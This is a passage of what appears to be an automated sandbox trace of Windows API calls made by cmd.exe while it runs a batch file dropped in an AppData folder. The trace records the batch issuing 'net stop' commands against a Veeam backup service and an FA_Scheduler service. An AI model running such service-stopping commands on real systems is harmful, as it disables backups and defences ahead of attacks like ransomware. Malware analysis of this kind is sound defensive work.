_String2="PAUSE") returned -2 [0041.409] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0041.409] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0041.409] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0041.409] _wcsicmp (_String1="net", _String2="MD") returned 1 [0041.409] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0041.409] _wcsicmp (_String1="net", _String2="RD") returned -4 [0041.409] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0041.409] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0041.409] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0041.409] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0041.409] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0041.409] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0041.409] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0041.409] _wcsicmp (_String1="net", _String2="VER") returned -8 [0041.409] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0041.409] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0041.409] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0041.409] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0041.409] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0041.409] _wcsicmp (_String1="net", _String2="START") returned -5 [0041.409] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0041.409] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0041.409] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0041.409] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0041.409] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0041.409] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0041.409] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0041.409] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0041.410] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0041.410] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0041.410] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0041.410] SetErrorMode (uMode=0x0) returned 0x1 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0041.410] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0041.410] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0041.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0041.410] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0041.410] GetProcessHeap () returned 0x3e0000 [0041.410] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0041.410] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.410] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.410] GetLastError () returned 0x2 [0041.411] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.411] GetLastError () returned 0x2 [0041.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.411] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.411] GetLastError () returned 0x2 [0041.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.411] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.411] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.412] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0041.412] SetErrorMode (uMode=0x0) returned 0x1 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0041.412] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0041.412] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0041.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0041.412] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0041.412] GetProcessHeap () returned 0x3e0000 [0041.412] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0041.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.412] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.412] GetLastError () returned 0x2 [0041.412] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.413] GetLastError () returned 0x2 [0041.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0041.413] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0041.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.413] GetLastError () returned 0x2 [0041.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0041.413] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0041.413] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.413] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0041.413] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0041.413] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0041.413] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.413] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamNFSSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamNFSSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamNFSSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xc4, dwThreadId=0x62c)) returned 1 [0041.417] CloseHandle (hObject=0x78) returned 1 [0041.417] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.417] GetProcessHeap () returned 0x3e0000 [0041.417] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.417] GetEnvironmentStringsW () returned 0x3f8408* [0041.417] GetProcessHeap () returned 0x3e0000 [0041.417] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.417] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.417] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0041.730] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0041.761] CloseHandle (hObject=0x74) returned 1 [0041.761] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0041.761] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0041.761] GetProcessHeap () returned 0x3e0000 [0041.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.761] GetEnvironmentStringsW () returned 0x3f8408* [0041.761] GetProcessHeap () returned 0x3e0000 [0041.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.761] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.761] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0041.761] GetProcessHeap () returned 0x3e0000 [0041.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.761] GetEnvironmentStringsW () returned 0x3f8408* [0041.762] GetProcessHeap () returned 0x3e0000 [0041.762] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.762] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.762] GetProcessHeap () returned 0x3e0000 [0041.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0041.762] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0041.762] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.762] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0041.762] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.762] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0041.762] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.762] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0041.762] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.762] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0041.763] SetConsoleInputExeNameW () returned 0x1 [0041.763] GetConsoleOutputCP () returned 0x1b5 [0041.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0041.763] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0041.763] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0041.763] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.763] SetFilePointer (in: hFile=0x74, lDistanceToMove=1606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x646 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0041.763] GetProcessHeap () returned 0x3e0000 [0041.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0041.764] GetProcessHeap () returned 0x3e0000 [0041.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0041.764] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.764] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x646 [0041.764] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x127b, lpOverlapped=0x0) returned 1 [0041.764] SetFilePointer (in: hFile=0x74, lDistanceToMove=1632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x660 [0041.764] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop FA_Scheduler /y\r\nper /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0041.764] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.764] GetFileType (hFile=0x74) returned 0x1 [0041.764] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.764] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x660 [0041.765] GetProcessHeap () returned 0x3e0000 [0041.765] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0041.765] GetProcessHeap () returned 0x3e0000 [0041.765] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0041.765] _tell (_FileHandle=3) returned 1632 [0041.765] _close (_FileHandle=3) returned 0 [0041.765] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0041.765] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0041.765] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0041.765] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0041.765] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0041.765] _wcsicmp (_String1="net", _String2="CD") returned 11 [0041.765] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0041.765] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0041.765] _wcsicmp (_String1="net", _String2="REN") returned -4 [0041.765] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0041.765] _wcsicmp (_String1="net", _String2="SET") returned -5 [0041.765] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0041.766] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0041.766] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0041.766] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0041.766] _wcsicmp (_String1="net", _String2="MD") returned 1 [0041.766] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0041.766] _wcsicmp (_String1="net", _String2="RD") returned -4 [0041.766] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0041.766] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0041.766] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0041.766] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0041.766] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0041.766] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0041.766] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0041.766] _wcsicmp (_String1="net", _String2="VER") returned -8 [0041.766] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0041.766] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0041.766] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0041.766] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0041.766] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0041.766] _wcsicmp (_String1="net", _String2="START") returned -5 [0041.766] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0041.766] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0041.766] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0041.766] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0041.766] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0041.766] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0041.766] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0041.766] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0041.766] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0041.766] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0041.766] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0041.766] SetErrorMode (uMode=0x0) returned 0x1 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0041.767] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0041.767] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0041.767] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0041.767] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0041.767] GetProcessHeap () returned 0x3e0000 [0041.767] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0041.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.767] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.767] GetLastError () returned 0x2 [0041.767] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.767] GetLastError () returned 0x2 [0041.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.768] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.768] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.768] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.768] GetLastError () returned 0x2 [0041.768] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.768] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.768] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.768] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0041.768] SetErrorMode (uMode=0x0) returned 0x1 [0041.768] GetProcessHeap () returned 0x3e0000 [0041.768] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0041.768] GetProcessHeap () returned 0x3e0000 [0041.768] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0041.768] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.769] GetProcessHeap () returned 0x3e0000 [0041.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0041.769] GetProcessHeap () returned 0x3e0000 [0041.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0041.769] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0041.769] GetProcessHeap () returned 0x3e0000 [0041.769] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0041.769] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: 